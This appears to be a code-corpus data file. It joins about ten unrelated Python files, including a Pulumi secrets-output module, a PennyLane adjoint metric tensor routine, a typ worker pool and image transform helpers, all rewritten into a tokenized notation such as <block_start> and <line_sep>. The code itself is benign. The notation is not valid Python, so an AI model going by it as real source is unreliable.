<block_start>log.error(f'{address} failed to decode as ERC20 token. Trying UNIV1 LP token. {str(e)}' )<line_sep>contract=EthereumContract(address=address abi=UNIV1_LP_ABI deployed_block=0)<line_sep>decoded=[contract.decode(x[1] method_name)[0]# pylint: disable=E1136
<if>x[0]<and>len(x[1])<else><none><for>(x method_name) zip(output properties)]<line_sep>log.debug(f'{address} was succesfuly decoded as ERC20 token')<block_end><for_stmt>prop,value zip(properties decoded)<block_start><if_stmt>isinstance(value bytes)<block_start>value=value.rstrip(b'\x00').decode()<block_end>info[prop]=value<block_end>self.contract_info_cache[address]=info<line_sep><return>info<block_end><block_end> |
<import_from_stmt>psutil virtual_memory<def_stmt>mock_cluster n_workers=1 threads_per_worker=1 diagnostics_port=8787 memory_limit=<none> **dask_kwarg<block_start><return>(n_workers threads_per_worker diagnostics_port memory_limit)<block_end><class_stmt>MockClient()<block_start><def_stmt>__init__ self cluster<block_start>self.cluster=cluster<block_end><def_stmt>scheduler_info self<block_start><return>{'workers':{'worker 1':{'memory_limit':virtual_memory().total}}}<block_end><block_end><def_stmt>get_mock_client_cluster <block_start><return>MockClient mock_cluster<block_end> |
<import_from_stmt>datetime datetime timezone<import_from_stmt>.enums StatisticTypeEnum<def_stmt>convert_timestamp_to_datetime timestamp:float<arrow>datetime<block_start>"""
Convert timestamp date format to datetime.
Arguments:
timestamp {float} -- Input timestamp.
Returns:
datetime -- Datetime formatted object which represents the
same information as timestamp.
"""<line_sep><return>datetime.fromtimestamp(timestamp timezone.utc)<block_end><def_stmt>get_enum_type statistic_type:str<arrow>StatisticTypeEnum<block_start>"""
Convert string object to enum.
Arguments:
statistic_type {str} -- Input string.
Returns:
StatisticTypeEnum -- Enum corresponding to statistic_type.
"""<line_sep><return>(StatisticTypeEnum.ALERT<if>statistic_type.lower()<eq>"alerts"<else>StatisticTypeEnum.REPORT)<block_end> |
"""
===================
Plot 2D Volume Data
===================
This plots example volume data onto an example subject, S1, onto a flatmap
using quickflat. In order for this to run, you have to have a flatmap for
this subject in the pycortex filestore.
The cortex.Volume2D object is instantiated with two numpy arrays of the same
size as the scan for this subject and transform. Here, there are two datasets
that have been generated to look like gradients across the brain, but you can
replace these with any numpy arrays of the correct dimensionality.
The colormap used in the first two flatmaps is
.. image:: ../../../filestore/colormaps/RdBu_covar.png
As with a 1D Volume, you can change vmin and vmax to threshold, but here
they can be manipulated individually for the two arrays.
You can also change the colormap when creating a new 2D volume. The colormap
used in the last flatmap is
.. image:: ../../../filestore/colormaps/GreenWhiteBlue_2D.png
"""<import_stmt>cortex<import_stmt>numpy<as>np<import_stmt>matplotlib.pyplot<as>plt<line_sep>subject="S1"<line_sep>xfm="fullhead"<line_sep># Creating two different test datasets that are both the same shape as this
# transform with one entry for each voxel
# The matrices have just been reordered in different ways so that they make
# gradients across the brain in different directions
test_data1=np.arange(31<times>100<times>100).reshape((31 100 100) order='C')<line_sep>test_data2=np.arange(31<times>100<times>100).reshape((31 100 100) order='F')<line_sep># This creates a 2D Volume object for both of our test datasets for the given
# subject and transform
vol_data=cortex.Volume2D(test_data1 test_data2 subject xfm)<line_sep>cortex.quickshow(vol_data with_colorbar=<false>)<line_sep>plt.show()<line_sep># You can alter the minimum and maximum values shown on the colorbar and this
# can be done separately for the two different datasets
vol_data=cortex.Volume2D(test_data1 test_data2 subject xfm vmin=np.mean(test_data1) vmax=np.max(test_data1) vmin2=np.min(test_data2) vmax2=np.mean(test_data2))<line_sep>cortex.quickshow(vol_data with_colorbar=<false>)<line_sep>plt.show()<line_sep># To change the colormap, you have to create a new Volume2D object
vol_color=cortex.Volume2D(test_data1 test_data2 subject xfm cmap="GreenWhiteBlue_2D")<line_sep>cortex.quickshow(vol_color with_colorbar=<false>)<line_sep>plt.show()<line_sep> |
# Copyright (c) OpenMMLab. All rights reserved.
<import_stmt>mmcv<def_stmt>convert_annotations image_infos out_json_name<block_start>"""Convert the annotation into coco style.
Args:
image_infos(list): The list of image information dicts
out_json_name(str): The output json filename
Returns:
out_json(dict): The coco style dict
"""<assert_stmt>isinstance(image_infos list)<assert_stmt>isinstance(out_json_name str)<assert_stmt>out_json_name<line_sep>out_json=dict()<line_sep>img_id=0<line_sep>ann_id=0<line_sep>out_json['images']=[]<line_sep>out_json['categories']=[]<line_sep>out_json['annotations']=[]<for_stmt>image_info image_infos<block_start>image_info['id']=img_id<line_sep>anno_infos=image_info.pop('anno_info')<line_sep>out_json['images'].append(image_info)<for_stmt>anno_info anno_infos<block_start>anno_info['image_id']=img_id<line_sep>anno_info['id']=ann_id<line_sep>out_json['annotations'].append(anno_info)<line_sep>ann_id<augadd>1<block_end>img_id<augadd>1<block_end>cat=dict(id=1 name='text')<line_sep>out_json['categories'].append(cat)<if_stmt>len(out_json['annotations'])<eq>0<block_start>out_json.pop('annotations')<block_end>mmcv.dump(out_json out_json_name)<line_sep><return>out_json<block_end> |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
<import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['SecretReplica' 'SecretRotationRotationRules' 'SecretRotationRules' 'GetSecretRotationRotationRuleResult' 'GetSecretRotationRuleResult' ]<line_sep>@pulumi.output_type<class_stmt>SecretReplica(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"kmsKeyId"<block_start>suggest="kms_key_id"<block_end><elif_stmt>key<eq>"lastAccessedDate"<block_start>suggest="last_accessed_date"<block_end><elif_stmt>key<eq>"statusMessage"<block_start>suggest="status_message"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in SecretReplica. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>SecretReplica.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>SecretReplica.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * region:str kms_key_id:Optional[str]=<none> last_accessed_date:Optional[str]=<none> status:Optional[str]=<none> status_message:Optional[str]=<none><block_start>"""
:param str region: Region for replicating the secret.
:param str kms_key_id: ARN, Key ID, or Alias.
:param str last_accessed_date: Date that you last accessed the secret in the Region.
:param str status: Status can be `InProgress`, `Failed`, or `InSync`.
:param str status_message: Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""<line_sep>pulumi.set(__self__ "region" region)<if_stmt>kms_key_id<is><not><none><block_start>pulumi.set(__self__ "kms_key_id" kms_key_id)<block_end><if_stmt>last_accessed_date<is><not><none><block_start>pulumi.set(__self__ "last_accessed_date" last_accessed_date)<block_end><if_stmt>status<is><not><none><block_start>pulumi.set(__self__ "status" status)<block_end><if_stmt>status_message<is><not><none><block_start>pulumi.set(__self__ "status_message" status_message)<block_end><block_end>@property@pulumi.getter<def_stmt>region self<arrow>str<block_start>"""
Region for replicating the secret.
"""<line_sep><return>pulumi.get(self "region")<block_end>@property@pulumi.getter(name="kmsKeyId")<def_stmt>kms_key_id self<arrow>Optional[str]<block_start>"""
ARN, Key ID, or Alias.
"""<line_sep><return>pulumi.get(self "kms_key_id")<block_end>@property@pulumi.getter(name="lastAccessedDate")<def_stmt>last_accessed_date self<arrow>Optional[str]<block_start>"""
Date that you last accessed the secret in the Region.
"""<line_sep><return>pulumi.get(self "last_accessed_date")<block_end>@property@pulumi.getter<def_stmt>status self<arrow>Optional[str]<block_start>"""
Status can be `InProgress`, `Failed`, or `InSync`.
"""<line_sep><return>pulumi.get(self "status")<block_end>@property@pulumi.getter(name="statusMessage")<def_stmt>status_message self<arrow>Optional[str]<block_start>"""
Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""<line_sep><return>pulumi.get(self "status_message")<block_end><block_end>@pulumi.output_type<class_stmt>SecretRotationRotationRules(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"automaticallyAfterDays"<block_start>suggest="automatically_after_days"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in SecretRotationRotationRules. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>SecretRotationRotationRules.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>SecretRotationRotationRules.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start>"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep><return>pulumi.get(self "automatically_after_days")<block_end><block_end>@pulumi.output_type<class_stmt>SecretRotationRules(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"automaticallyAfterDays"<block_start>suggest="automatically_after_days"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in SecretRotationRules. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>SecretRotationRules.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>SecretRotationRules.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start>"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep><return>pulumi.get(self "automatically_after_days")<block_end><block_end>@pulumi.output_type<class_stmt>GetSecretRotationRotationRuleResult(dict)<block_start><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start><return>pulumi.get(self "automatically_after_days")<block_end><block_end>@pulumi.output_type<class_stmt>GetSecretRotationRuleResult(dict)<block_start><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start><return>pulumi.get(self "automatically_after_days")<block_end><block_end> |
<import_from_stmt>braintree.exceptions.unexpected_error UnexpectedError<class_stmt>ConnectionError(UnexpectedError)<block_start><pass><block_end> |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>copy<import_stmt>multiprocessing<import_stmt>pickle<import_stmt>traceback<import_from_stmt>typ.host Host<def_stmt>make_pool host jobs callback context pre_fn post_fn<block_start>_validate_args(context pre_fn post_fn)<if_stmt>jobs<g>1<block_start><return>_ProcessPool(host jobs callback context pre_fn post_fn)<block_end><else_stmt><block_start><return>_AsyncPool(host jobs callback context pre_fn post_fn)<block_end><block_end><class_stmt>_MessageType(object)<block_start>Request='Request'<line_sep>Response='Response'<line_sep>Close='Close'<line_sep>Done='Done'<line_sep>Error='Error'<line_sep>Interrupt='Interrupt'<line_sep>values=[Request Response Close Done Error Interrupt]<block_end><def_stmt>_validate_args context pre_fn post_fn<block_start><try_stmt><block_start>_=pickle.dumps(context)<block_end><except_stmt>Exception<as>e<block_start><raise>ValueError('context passed to make_pool is not picklable: %s'%str(e))<block_end><try_stmt><block_start>_=pickle.dumps(pre_fn)<block_end><except_stmt>pickle.PickleError<block_start><raise>ValueError('pre_fn passed to make_pool is not picklable')<block_end><try_stmt><block_start>_=pickle.dumps(post_fn)<block_end><except_stmt>pickle.PickleError<block_start><raise>ValueError('post_fn passed to make_pool is not picklable')<block_end><block_end><class_stmt>_ProcessPool(object)<block_start><def_stmt>__init__ self host jobs callback context pre_fn post_fn<block_start>self.host=host<line_sep>self.jobs=jobs<line_sep>self.requests=multiprocessing.Queue()<line_sep>self.responses=multiprocessing.Queue()<line_sep>self.workers=[]<line_sep>self.discarded_responses=[]<line_sep>self.closed=<false><line_sep>self.erred=<false><for_stmt>worker_num range(1 jobs+1)<block_start>w=multiprocessing.Process(target=_loop args=(self.requests self.responses host.for_mp() worker_num callback context pre_fn post_fn))<line_sep>w.start()<line_sep>self.workers.append(w)<block_end><block_end><def_stmt>send self 
msg<block_start>self.requests.put((_MessageType.Request msg))<block_end><def_stmt>get self<block_start>msg_type,resp=self.responses.get()<if_stmt>msg_type<eq>_MessageType.Error<block_start>self._handle_error(resp)<block_end><elif_stmt>msg_type<eq>_MessageType.Interrupt<block_start><raise>KeyboardInterrupt<block_end><assert_stmt>msg_type<eq>_MessageType.Response<line_sep><return>resp<block_end><def_stmt>close self<block_start><for_stmt>_ self.workers<block_start>self.requests.put((_MessageType.Close <none>))<block_end>self.closed=<true><block_end><def_stmt>join self# TODO: one would think that we could close self.requests in close(),
# above, and close self.responses below, but if we do, we get
# weird tracebacks in the daemon threads multiprocessing starts up.
# Instead, we have to hack the innards of multiprocessing. It
# seems likely that there's a bug somewhere, either in this module or
# in multiprocessing.
# pylint: disable=protected-access
<block_start><if_stmt>self.host.is_python3# pragma: python3
<block_start>multiprocessing.queues.is_exiting=<lambda>:<true><block_end><else_stmt># pragma: python2
<block_start>multiprocessing.util._exiting=<true><block_end><if_stmt><not>self.closed# We must be aborting; terminate the workers rather than
# shutting down cleanly.
<block_start><for_stmt>w self.workers<block_start>w.terminate()<line_sep>w.join()<block_end><return>[]<block_end>final_responses=[]<line_sep>error=<none><line_sep>interrupted=<none><for_stmt>w self.workers<block_start><while_stmt><true><block_start>msg_type,resp=self.responses.get()<if_stmt>msg_type<eq>_MessageType.Error<block_start>error=resp<line_sep><break><block_end><if_stmt>msg_type<eq>_MessageType.Interrupt<block_start>interrupted=<true><line_sep><break><block_end><if_stmt>msg_type<eq>_MessageType.Done<block_start>final_responses.append(resp[1])<line_sep><break><block_end>self.discarded_responses.append(resp)<block_end><block_end><for_stmt>w self.workers<block_start>w.join()<block_end># TODO: See comment above at the beginning of the function for
# why this is commented out.
# self.responses.close()
<if_stmt>error<block_start>self._handle_error(error)<block_end><if_stmt>interrupted<block_start><raise>KeyboardInterrupt<block_end><return>final_responses<block_end><def_stmt>_handle_error self msg<block_start>worker_num,tb=msg<line_sep>self.erred=<true><line_sep><raise>Exception("Error from worker %d (traceback follows):\n%s"%(worker_num tb))<block_end><block_end># 'Too many arguments' pylint: disable=R0913
<def_stmt>_loop requests responses host worker_num callback context pre_fn post_fn should_loop=<true><block_start>host=host<or>Host()<try_stmt><block_start>context_after_pre=pre_fn(host worker_num context)<line_sep>keep_looping=<true><while_stmt>keep_looping<block_start>message_type,args=requests.get(block=<true>)<if_stmt>message_type<eq>_MessageType.Close<block_start>responses.put((_MessageType.Done (worker_num post_fn(context_after_pre))))<line_sep><break><block_end><assert_stmt>message_type<eq>_MessageType.Request<line_sep>resp=callback(context_after_pre args)<line_sep>responses.put((_MessageType.Response resp))<line_sep>keep_looping=should_loop<block_end><block_end><except_stmt>KeyboardInterrupt<as>e<block_start>responses.put((_MessageType.Interrupt (worker_num str(e))))<block_end><except_stmt>Exception<as>e<block_start>responses.put((_MessageType.Error (worker_num traceback.format_exc(e))))<block_end><block_end><class_stmt>_AsyncPool(object)<block_start><def_stmt>__init__ self host jobs callback context pre_fn post_fn<block_start>self.host=host<or>Host()<line_sep>self.jobs=jobs<line_sep>self.callback=callback<line_sep>self.context=copy.deepcopy(context)<line_sep>self.msgs=[]<line_sep>self.closed=<false><line_sep>self.post_fn=post_fn<line_sep>self.context_after_pre=pre_fn(self.host 1 self.context)<line_sep>self.final_context=<none><block_end><def_stmt>send self msg<block_start>self.msgs.append(msg)<block_end><def_stmt>get self<block_start><return>self.callback(self.context_after_pre self.msgs.pop(0))<block_end><def_stmt>close self<block_start>self.closed=<true><line_sep>self.final_context=self.post_fn(self.context_after_pre)<block_end><def_stmt>join self<block_start><if_stmt><not>self.closed<block_start>self.close()<block_end><return>[self.final_context]<block_end><block_end> |
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image functions."""<line_sep># python3
<import_from_stmt>cvx2 latest<as>cv2<import_stmt>numpy<as>np<def_stmt>get_affine_transform center scale rot output_size inverse=<false><block_start>"""Affine transform."""<if_stmt><not>isinstance(scale (np.ndarray list))<block_start>scale=np.array([scale scale] dtype=np.float32)<block_end>dst_w,dst_h=output_size[0] output_size[1]<line_sep>rot_rad=np.pi<times>rot/180<line_sep>src_dir=get_dir([0 scale[0]<times>-0.5] rot_rad)<line_sep>dst_dir=np.array([0 dst_w<times>-0.5] np.float32)<line_sep>src=np.zeros((3 2) dtype=np.float32)<line_sep>dst=np.zeros((3 2) dtype=np.float32)<line_sep>src[0 :],src[1 :]=center center+src_dir<line_sep>dst[0 :]=[dst_w<times>0.5 dst_h<times>0.5]<line_sep>dst[1 :]=np.array([dst_w<times>0.5 dst_h<times>0.5] np.float32)+dst_dir<line_sep>src[2: :]=get_3rd_point(src[0 :] src[1 :])<line_sep>dst[2: :]=get_3rd_point(dst[0 :] dst[1 :])<if_stmt>inverse<block_start>transform=cv2.getAffineTransform(np.float32(dst) np.float32(src))<block_end><else_stmt><block_start>transform=cv2.getAffineTransform(np.float32(src) np.float32(dst))<block_end><return>transform<block_end><def_stmt>get_3rd_point point_1 point_2<block_start>tmp_point=point_1-point_2<line_sep><return>point_2+np.array([-tmp_point[1] tmp_point[0]] dtype=np.float32)<block_end><def_stmt>get_dir point rot_rad<block_start>sin_rot,cos_rot=np.sin(rot_rad) np.cos(rot_rad)<line_sep>result=[0 0]<line_sep>result[0]=point[0]<times>cos_rot-point[1]<times>sin_rot<line_sep>result[1]=point[0]<times>sin_rot+point[1]<times>cos_rot<line_sep><return>np.array(result)<block_end><def_stmt>transform_points points center scale output_size inverse=<false><block_start>transform=get_affine_transform(center scale 0 output_size inverse=inverse)<line_sep>new_points=np.concatenate([points np.ones([points.shape[0] 1])] axis=1)<line_sep>points_transformed=np.dot(transform new_points.T).T<line_sep><return>points_transformed<block_end><def_stmt>transform_predictions points center scale 
output_size<block_start><return>transform_points(points center scale output_size inverse=<true>)<block_end> |
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the adjoint_metric_tensor.
"""<import_stmt>warnings<import_from_stmt>itertools chain<import_from_stmt>pennylane numpy<as>np<import_stmt>pennylane<as>qml<line_sep># pylint: disable=protected-access
<import_from_stmt>pennylane.transforms.metric_tensor _contract_metric_tensor_with_cjac<def_stmt>_apply_operations state op device invert=<false><block_start>"""Wrapper that allows to apply a variety of operations---or groups
of operations---to a state or to prepare a new state.
If ``invert=True``, this function makes sure not to alter the operations.
The state of the device, however may be altered, depending on the
device and performed operation(s).
"""<line_sep># pylint: disable=protected-access
<if_stmt>isinstance(op (list np.ndarray))<block_start><if_stmt>invert<block_start>op=op[::-1]<block_end><for_stmt>_op op<block_start>state=_apply_operations(state _op device invert)<block_end><return>state<block_end><if_stmt>isinstance(op qml.QubitStateVector)<block_start><if_stmt>invert<block_start><raise>ValueError("Can't invert state preparation.")<block_end>device._apply_state_vector(op.parameters[0] op.wires)<line_sep><return>device._state<block_end><if_stmt>isinstance(op qml.BasisState)<block_start><if_stmt>invert<block_start><raise>ValueError("Can't invert state preparation.")<block_end>device._apply_basis_state(op.parameters[0] op.wires)<line_sep><return>device._state<block_end><if_stmt>invert<block_start>op.inv()<block_end>state=device._apply_operation(state op)<if_stmt>invert<block_start>op.inv()<block_end><return>state<block_end><def_stmt>_group_operations tape<block_start>"""Divide all operations of a tape into trainable operations and blocks
of untrainable operations after each trainable one."""<line_sep># Extract tape operations list
ops=tape.operations<line_sep># Find the indices of trainable operations in the tape operations list
trainables=np.where([qml.operation.is_trainable(op)<for>op ops])[0]<line_sep># Add the indices incremented by one to the trainable indices
split_ids=list(chain.from_iterable([idx idx+1]<for>idx trainables))<line_sep># Split at trainable and incremented indices to get groups after trainable
# operations and single trainable operations (in alternating order)
all_groups=np.split(ops split_ids)<line_sep># Collect trainable operations and groups after trainable operations
# the first set of non-trainable ops are the ops "after the -1st" trainable op
group_after_trainable_op=dict(enumerate(all_groups[::2] start=-1))<line_sep>trainable_operations=list(chain.from_iterable(all_groups[1::2]))<line_sep><return>trainable_operations group_after_trainable_op<block_end><def_stmt>adjoint_metric_tensor circuit device=<none> hybrid=<true><block_start>r"""Implements the adjoint method outlined in
`Jones <https://arxiv.org/abs/2011.02991>`__ to compute the metric tensor.
A forward pass followed by intermediate partial backwards passes are
used to evaluate the metric tensor in :math:`\mathcal{O}(p^2)` operations,
where :math:`p` is the number of trainable operations, using 4 state
vectors.
.. note::
The adjoint metric tensor method has the following restrictions:
* Currently only ``"default.qubit"`` with ``shots=None`` is supported.
* We assume the circuit to be composed of unitary gates only and rely
on the ``generator`` property of the gates to be implemented.
Note also that this makes the metric tensor strictly real-valued.
Args:
circuit (.QuantumTape or .QNode): Circuit to compute the metric tensor of
device (.Device): Device to use for the adjoint method
hybrid (bool): Whether to take classical preprocessing into account. Ignored if
``circuit`` is a tape.
Returns:
array: the metric tensor of the tape with respect to its trainable parameters.
Dimensions are ``(tape.num_params, tape.num_params)``.
.. seealso:: :func:`~.metric_tensor` for hardware-compatible metric tensor computations.
**Example**
Consider the following QNode:
.. code-block:: python
dev = qml.device("default.qubit", wires=3)
@qml.qnode(dev, interface="autograd")
def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=0)
qml.CNOT(wires=[0, 1])
qml.RZ(weights[2], wires=1)
qml.RZ(weights[3], wires=0)
return qml.expval(qml.PauliZ(0) @ qml.PauliZ(1)), qml.expval(qml.PauliY(1))
We can use the ``adjoint_metric_tensor`` transform to generate a new function
that returns the metric tensor of this QNode:
>>> mt_fn = qml.adjoint_metric_tensor(circuit)
>>> weights = np.array([0.1, 0.2, 0.4, 0.5], requires_grad=True)
>>> mt_fn(weights)
tensor([[ 0.25 , 0. , -0.0497, -0.0497],
[ 0. , 0.2475, 0.0243, 0.0243],
[-0.0497, 0.0243, 0.0123, 0.0123],
[-0.0497, 0.0243, 0.0123, 0.0123]], requires_grad=True)
This approach has the benefit of being significantly faster than the hardware-ready
``metric_tensor`` function:
>>> import time
>>> start_time = time.process_time()
>>> mt = mt_fn(weights)
>>> time.process_time() - start_time
0.019
>>> mt_fn_2 = qml.metric_tensor(circuit)
>>> start_time = time.process_time()
>>> mt = mt_fn_2(weights)
>>> time.process_time() - start_time
0.025
This speedup becomes more drastic for larger circuits.
The drawback of the adjoint method is that it is only available on simulators and without
shot simulations.
"""<if_stmt>isinstance(circuit qml.tape.QuantumTape)<block_start><return>_adjoint_metric_tensor_tape(circuit device)<block_end><if_stmt>isinstance(circuit (qml.QNode qml.ExpvalCost))<block_start><return>_adjoint_metric_tensor_qnode(circuit device hybrid)<block_end><raise>qml.QuantumFunctionError("The passed object is not a QuantumTape or QNode.")<block_end><def_stmt>_adjoint_metric_tensor_tape tape device<block_start>"""Computes the metric tensor of a tape using the adjoint method and a given device."""<line_sep># pylint: disable=protected-access
<if_stmt>device.shots<is><not><none><block_start><raise>ValueError("The adjoint method for the metric tensor is only implemented for shots=None")<block_end>tape=qml.transforms.expand_trainable_multipar(tape)<line_sep># Divide all operations of a tape into trainable operations and blocks
# of untrainable operations after each trainable one.
trainable_operations,group_after_trainable_op=_group_operations(tape)<line_sep>dim=2<power>device.num_wires<line_sep># generate and extract initial state
psi=device._create_basis_state(0)<line_sep># initialize metric tensor components (which all will be real-valued)
like_real=qml.math.real(psi[0])<line_sep>L=qml.math.convert_like(qml.math.zeros((tape.num_params tape.num_params)) like_real)<line_sep>T=qml.math.convert_like(qml.math.zeros((tape.num_params )) like_real)<line_sep>psi=_apply_operations(psi group_after_trainable_op[-1] device)<for_stmt>j,outer_op enumerate(trainable_operations)<block_start>generator_1,prefactor_1=qml.generator(outer_op)<line_sep>generator_1=qml.matrix(generator_1)<line_sep># the state vector phi is missing a factor of 1j * prefactor_1
phi=device._apply_unitary(psi qml.math.convert_like(generator_1 like_real) outer_op.wires)<line_sep>phi_real=qml.math.reshape(qml.math.real(phi) (dim ))<line_sep>phi_imag=qml.math.reshape(qml.math.imag(phi) (dim ))<line_sep>diag_value=prefactor_1<power>2<times>(qml.math.dot(phi_real phi_real)+qml.math.dot(phi_imag phi_imag))<line_sep>L=qml.math.scatter_element_add(L (j j) diag_value)<line_sep>lam=psi<times>1.0<line_sep>lam_real=qml.math.reshape(qml.math.real(lam) (dim ))<line_sep>lam_imag=qml.math.reshape(qml.math.imag(lam) (dim ))<line_sep># this entry is missing a factor of 1j
value=prefactor_1<times>(qml.math.dot(lam_real phi_real)+qml.math.dot(lam_imag phi_imag))<line_sep>T=qml.math.scatter_element_add(T (j ) value)<for_stmt>i range(j-1 -1 -1)# after first iteration of inner loop: apply U_{i+1}^\dagger
<block_start><if_stmt>i<l>j-1<block_start>phi=_apply_operations(phi trainable_operations[i+1] device invert=<true>)<block_end># apply V_{i}^\dagger
phi=_apply_operations(phi group_after_trainable_op[i] device invert=<true>)<line_sep>lam=_apply_operations(lam group_after_trainable_op[i] device invert=<true>)<line_sep>inner_op=trainable_operations[i]<line_sep># extract and apply G_i
generator_2,prefactor_2=qml.generator(inner_op)<line_sep>generator_2=qml.matrix(generator_2)<line_sep># this state vector is missing a factor of 1j * prefactor_2
mu=device._apply_unitary(lam qml.math.convert_like(generator_2 lam) inner_op.wires)<line_sep>phi_real=qml.math.reshape(qml.math.real(phi) (dim ))<line_sep>phi_imag=qml.math.reshape(qml.math.imag(phi) (dim ))<line_sep>mu_real=qml.math.reshape(qml.math.real(mu) (dim ))<line_sep>mu_imag=qml.math.reshape(qml.math.imag(mu) (dim ))<line_sep># this entry is missing a factor of 1j * (-1j) = 1, i.e. none
value=(prefactor_1<times>prefactor_2<times>(qml.math.dot(mu_real phi_real)+qml.math.dot(mu_imag phi_imag)))<line_sep>L=qml.math.scatter_element_add(L [(i j) (j i)] value<times>qml.math.convert_like(qml.math.ones((2 )) value))<line_sep># apply U_i^\dagger
lam=_apply_operations(lam inner_op device invert=<true>)<block_end># apply U_j and V_j
psi=_apply_operations(psi [outer_op *group_after_trainable_op[j]] device)<block_end># postprocessing: combine L and T into the metric tensor.
# We require outer(conj(T), T) here, but as we skipped the factor 1j above,
# the stored T is real-valued. Thus we have -1j*1j*outer(T, T) = outer(T, T)
metric_tensor=L-qml.math.tensordot(T T 0)<line_sep><return>metric_tensor<block_end><def_stmt>_adjoint_metric_tensor_qnode qnode device hybrid<block_start>"""Computes the metric tensor of a qnode using the adjoint method and its device.
For ``hybrid==True`` this wrapper accounts for classical preprocessing within the
QNode.
"""<if_stmt>device<is><none><block_start><if_stmt>isinstance(qnode qml.ExpvalCost)<block_start><if_stmt>qnode._multiple_devices# pylint: disable=protected-access
<block_start>warnings.warn("ExpvalCost was instantiated with multiple devices. Only the first device "<concat>"will be used to evaluate the metric tensor with the adjoint method." UserWarning )<block_end>qnode=qnode.qnodes.qnodes[0]<block_end>device=qnode.device<block_end>cjac_fn=qml.transforms.classical_jacobian(qnode expand_fn=qml.transforms.expand_trainable_multipar)<def_stmt>wrapper *args **kwargs<block_start>qnode.construct(args kwargs)<line_sep>mt=_adjoint_metric_tensor_tape(qnode.qtape device)<if_stmt><not>hybrid<block_start><return>mt<block_end>cjac=cjac_fn(*args **kwargs)<line_sep><return>_contract_metric_tensor_with_cjac(mt cjac)<block_end><return>wrapper<block_end> |
